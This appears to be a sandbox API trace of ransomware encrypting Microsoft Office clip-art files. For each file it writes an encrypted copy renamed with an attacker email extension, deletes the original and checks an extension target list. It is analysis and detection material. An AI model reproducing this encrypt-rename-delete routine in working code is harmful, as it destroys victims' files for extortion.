	[0153.850] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099192.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099192.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0153.852] GetLastError () returned 0x0
	[0153.852] ReadFile (in: hFile=0x3e8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x462c, lpOverlapped=0x0) returned 1
	[0154.201] WriteFile (in: hFile=0x31c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x4630, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x4630, lpOverlapped=0x0) returned 1
	[0154.202] ReadFile (in: hFile=0x3e8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0154.202] WriteFile (in: hFile=0x31c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0154.203] SetEndOfFile (hFile=0x31c) returned 1
	[0154.203] CloseHandle (hObject=0x31c) returned 1
	[0154.203] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.203] SetEndOfFile (hFile=0x3e8) returned 1
	[0154.205] CloseHandle (hObject=0x3e8) returned 1
	[0154.205] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099192.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0154.223] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099192.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099192.gif")) returned 1
	[0154.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099192.GIF") returned 63
	[0154.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099192.GIF") returned 63
	[0154.283] lstrlenW (lpString=".doc") returned 4
	[0154.283] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0154.283] lstrlenW (lpString=".docx") returned 5
	[0154.283] lstrcmpiW (lpString1=".docx", lpString2="2.GIF") returned -1
	[0154.283] lstrlenW (lpString=".pdf") returned 4
	[0154.283] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0154.283] lstrlenW (lpString=".xls") returned 4
	[0154.283] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0154.283] lstrlenW (lpString=".xlsx") returned 5
	[0154.283] lstrcmpiW (lpString1=".xlsx", lpString2="2.GIF") returned -1
	[0154.283] lstrlenW (lpString=".ppt") returned 4
	[0154.283] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0154.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099192.GIF") returned 63
	[0154.283] lstrlenW (lpString=".zip") returned 4
	[0154.283] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0154.284] lstrlenW (lpString=".rar") returned 4
	[0154.284] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0154.284] lstrlenW (lpString=".bz2") returned 4
	[0154.284] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0154.284] lstrlenW (lpString=".7z") returned 3
	[0154.284] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0154.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099192.GIF") returned 63
	[0154.284] lstrlenW (lpString=".dbf") returned 4
	[0154.284] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0154.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099192.GIF") returned 63
	[0154.284] lstrlenW (lpString=".1cd") returned 4
	[0154.284] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0154.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099192.GIF") returned 63
	[0154.284] lstrlenW (lpString=".jpg") returned 4
	[0154.284] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0154.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099192.GIF") returned 63
	[0154.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099192.GIF") returned 63
	[0154.284] lstrlenW (lpString=".doc") returned 4
	[0154.284] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0154.284] lstrlenW (lpString=".docx") returned 5
	[0154.284] lstrcmpiW (lpString1=".docx", lpString2="2.GIF") returned -1
	[0154.284] lstrlenW (lpString=".pdf") returned 4
	[0154.284] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0154.284] lstrlenW (lpString=".xls") returned 4
	[0154.284] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0154.284] lstrlenW (lpString=".xlsx") returned 5
	[0154.284] lstrcmpiW (lpString1=".xlsx", lpString2="2.GIF") returned -1
	[0154.284] lstrlenW (lpString=".ppt") returned 4
	[0154.284] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0154.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099192.GIF") returned 63
	[0154.284] lstrlenW (lpString=".zip") returned 4
	[0154.284] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0154.285] lstrlenW (lpString=".rar") returned 4
	[0154.285] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0154.285] lstrlenW (lpString=".bz2") returned 4
	[0154.285] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0154.285] lstrlenW (lpString=".7z") returned 3
	[0154.285] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0154.285] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099192.GIF") returned 63
	[0154.285] lstrlenW (lpString=".dbf") returned 4
	[0154.285] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0154.285] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099192.GIF") returned 63
	[0154.285] lstrlenW (lpString=".1cd") returned 4
	[0154.285] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0154.285] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099192.GIF") returned 63
	[0154.285] lstrlenW (lpString=".jpg") returned 4
	[0154.285] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0154.285] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0154.285] lstrlenW (lpString="J0099199.GIF") returned 12
	[0154.285] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099199.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099199.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0154.286] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=33975) returned 1
	[0154.286] CloseHandle (hObject=0x31c) returned 1
	[0154.286] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099199.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099199.gif")) returned 0x20
	[0154.286] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099199.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099199.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0154.286] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099199.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099199.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0154.286] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.286] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.286] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099199.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099199.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0154.287] GetLastError () returned 0x0
	[0154.287] ReadFile (in: hFile=0x31c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x84b7, lpOverlapped=0x0) returned 1
	[0154.307] WriteFile (in: hFile=0x39c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x84c0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x84c0, lpOverlapped=0x0) returned 1
	[0154.308] ReadFile (in: hFile=0x31c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0154.309] WriteFile (in: hFile=0x39c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0154.309] SetEndOfFile (hFile=0x39c) returned 1
	[0154.309] CloseHandle (hObject=0x39c) returned 1
	[0154.309] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.309] SetEndOfFile (hFile=0x31c) returned 1
	[0154.311] CloseHandle (hObject=0x31c) returned 1
	[0154.311] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099199.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0154.317] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099199.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099199.gif")) returned 1
	[0154.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099199.GIF") returned 63
	[0154.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099199.GIF") returned 63
	[0154.338] lstrlenW (lpString=".doc") returned 4
	[0154.338] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0154.338] lstrlenW (lpString=".docx") returned 5
	[0154.338] lstrcmpiW (lpString1=".docx", lpString2="9.GIF") returned -1
	[0154.338] lstrlenW (lpString=".pdf") returned 4
	[0154.338] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0154.338] lstrlenW (lpString=".xls") returned 4
	[0154.338] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0154.338] lstrlenW (lpString=".xlsx") returned 5
	[0154.338] lstrcmpiW (lpString1=".xlsx", lpString2="9.GIF") returned -1
	[0154.338] lstrlenW (lpString=".ppt") returned 4
	[0154.338] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0154.338] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099199.GIF") returned 63
	[0154.338] lstrlenW (lpString=".zip") returned 4
	[0154.338] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0154.338] lstrlenW (lpString=".rar") returned 4
	[0154.338] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0154.338] lstrlenW (lpString=".bz2") returned 4
	[0154.339] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0154.339] lstrlenW (lpString=".7z") returned 3
	[0154.339] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0154.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099199.GIF") returned 63
	[0154.339] lstrlenW (lpString=".dbf") returned 4
	[0154.339] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0154.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099199.GIF") returned 63
	[0154.339] lstrlenW (lpString=".1cd") returned 4
	[0154.339] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0154.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099199.GIF") returned 63
	[0154.339] lstrlenW (lpString=".jpg") returned 4
	[0154.339] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0154.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099199.GIF") returned 63
	[0154.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099199.GIF") returned 63
	[0154.339] lstrlenW (lpString=".doc") returned 4
	[0154.339] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0154.339] lstrlenW (lpString=".docx") returned 5
	[0154.339] lstrcmpiW (lpString1=".docx", lpString2="9.GIF") returned -1
	[0154.339] lstrlenW (lpString=".pdf") returned 4
	[0154.339] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0154.339] lstrlenW (lpString=".xls") returned 4
	[0154.339] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0154.339] lstrlenW (lpString=".xlsx") returned 5
	[0154.339] lstrcmpiW (lpString1=".xlsx", lpString2="9.GIF") returned -1
	[0154.339] lstrlenW (lpString=".ppt") returned 4
	[0154.339] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0154.339] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099199.GIF") returned 63
	[0154.339] lstrlenW (lpString=".zip") returned 4
	[0154.339] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0154.339] lstrlenW (lpString=".rar") returned 4
	[0154.339] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0154.340] lstrlenW (lpString=".bz2") returned 4
	[0154.340] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0154.340] lstrlenW (lpString=".7z") returned 3
	[0154.340] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0154.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099199.GIF") returned 63
	[0154.340] lstrlenW (lpString=".dbf") returned 4
	[0154.340] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0154.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099199.GIF") returned 63
	[0154.340] lstrlenW (lpString=".1cd") returned 4
	[0154.340] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0154.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099199.GIF") returned 63
	[0154.340] lstrlenW (lpString=".jpg") returned 4
	[0154.340] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0154.340] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0154.340] lstrlenW (lpString="J0099203.GIF") returned 12
	[0154.340] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099203.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099203.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0154.341] GetFileSizeEx (in: hFile=0x3e0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=3904) returned 1
	[0154.341] CloseHandle (hObject=0x3e0) returned 1
	[0154.341] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099203.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099203.gif")) returned 0x20
	[0154.341] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099203.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099203.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0154.341] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099203.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099203.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0154.341] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.341] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.341] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099203.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099203.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0154.342] GetLastError () returned 0x0
	[0154.342] ReadFile (in: hFile=0x3e0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0xf40, lpOverlapped=0x0) returned 1
	[0154.365] WriteFile (in: hFile=0x3e8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xf50, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xf50, lpOverlapped=0x0) returned 1
	[0154.366] ReadFile (in: hFile=0x3e0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0154.366] WriteFile (in: hFile=0x3e8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0154.367] SetEndOfFile (hFile=0x3e8) returned 1
	[0154.367] CloseHandle (hObject=0x3e8) returned 1
	[0154.367] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.367] SetEndOfFile (hFile=0x3e0) returned 1
	[0154.370] CloseHandle (hObject=0x3e0) returned 1
	[0154.370] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099203.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0154.370] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099203.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099203.gif")) returned 1
	[0154.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099203.GIF") returned 63
	[0154.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099203.GIF") returned 63
	[0154.371] lstrlenW (lpString=".doc") returned 4
	[0154.371] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0154.371] lstrlenW (lpString=".docx") returned 5
	[0154.371] lstrcmpiW (lpString1=".docx", lpString2="3.GIF") returned -1
	[0154.371] lstrlenW (lpString=".pdf") returned 4
	[0154.371] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0154.371] lstrlenW (lpString=".xls") returned 4
	[0154.371] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0154.371] lstrlenW (lpString=".xlsx") returned 5
	[0154.371] lstrcmpiW (lpString1=".xlsx", lpString2="3.GIF") returned -1
	[0154.371] lstrlenW (lpString=".ppt") returned 4
	[0154.371] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0154.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099203.GIF") returned 63
	[0154.371] lstrlenW (lpString=".zip") returned 4
	[0154.371] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0154.371] lstrlenW (lpString=".rar") returned 4
	[0154.371] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0154.371] lstrlenW (lpString=".bz2") returned 4
	[0154.372] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0154.372] lstrlenW (lpString=".7z") returned 3
	[0154.372] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0154.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099203.GIF") returned 63
	[0154.372] lstrlenW (lpString=".dbf") returned 4
	[0154.372] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0154.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099203.GIF") returned 63
	[0154.372] lstrlenW (lpString=".1cd") returned 4
	[0154.372] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0154.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099203.GIF") returned 63
	[0154.372] lstrlenW (lpString=".jpg") returned 4
	[0154.372] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0154.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099203.GIF") returned 63
	[0154.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099203.GIF") returned 63
	[0154.372] lstrlenW (lpString=".doc") returned 4
	[0154.372] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0154.372] lstrlenW (lpString=".docx") returned 5
	[0154.372] lstrcmpiW (lpString1=".docx", lpString2="3.GIF") returned -1
	[0154.372] lstrlenW (lpString=".pdf") returned 4
	[0154.372] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0154.372] lstrlenW (lpString=".xls") returned 4
	[0154.372] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0154.372] lstrlenW (lpString=".xlsx") returned 5
	[0154.372] lstrcmpiW (lpString1=".xlsx", lpString2="3.GIF") returned -1
	[0154.372] lstrlenW (lpString=".ppt") returned 4
	[0154.372] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0154.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099203.GIF") returned 63
	[0154.372] lstrlenW (lpString=".zip") returned 4
	[0154.372] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0154.372] lstrlenW (lpString=".rar") returned 4
	[0154.373] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0154.373] lstrlenW (lpString=".bz2") returned 4
	[0154.373] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0154.373] lstrlenW (lpString=".7z") returned 3
	[0154.373] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0154.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099203.GIF") returned 63
	[0154.373] lstrlenW (lpString=".dbf") returned 4
	[0154.373] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0154.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099203.GIF") returned 63
	[0154.373] lstrlenW (lpString=".1cd") returned 4
	[0154.373] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0154.373] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099203.GIF") returned 63
	[0154.373] lstrlenW (lpString=".jpg") returned 4
	[0154.373] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0154.373] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0154.373] lstrlenW (lpString="J0099204.WMF") returned 12
	[0154.373] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099204.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099204.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0154.477] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=17854) returned 1
	[0154.481] CloseHandle (hObject=0x3a0) returned 1
	[0154.481] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099204.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099204.wmf")) returned 0x20
	[0154.496] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099204.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099204.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0154.791] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099204.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099204.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0154.818] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.818] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.818] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099204.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099204.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0155.226] GetLastError () returned 0x0
